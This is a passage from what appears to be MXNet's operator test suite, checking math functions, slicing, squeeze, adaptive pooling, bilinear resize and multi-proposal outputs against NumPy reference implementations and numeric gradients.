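    assert np.isclose(np_smooth_l1_grad(0.5, 1.), 0.5)   # x * sigma**2
    assert np.isclose(np_smooth_l1_grad(2.0, 1.), 1.0)   # sign(x)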
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
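# Sketch (hypothetical helper, not collected by pytest): each adaptive-pool
# output bin covers input rows floor(oh*H/OH) .. ceil((oh+1)*H/OH), so the
# bins tile the full input range, e.g. [(0, 4), (3, 7), (6, 10)] for 10 -> 3.
def _demo_adaptive_pool_bins(isize=10, osize=3):
    bins = []
    for o in range(osize):
        start = int(np.floor(1.0 * o * isize / osize))
        end = int(np.ceil(1.0 * (o + 1) * isize / osize))
        bins.append((start, end))
    assert bins[0][0] == 0 and bins[-1][1] == isize
    return bins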
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
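# Sketch (hypothetical helper, not part of the original tests): the four
# bilinear weights used in py_bilinear_resize above are products of the
# per-axis fractional offsets and always sum to one.
def _demo_bilinear_weights(h1lambda=0.25, w1lambda=0.75):
    weights = [(1 - h1lambda) * (1 - w1lambda), (1 - h1lambda) * w1lambda,
               h1lambda * (1 - w1lambda), h1lambda * w1lambda]
    assert np.isclose(sum(weights), 1.0)
    return weights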
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
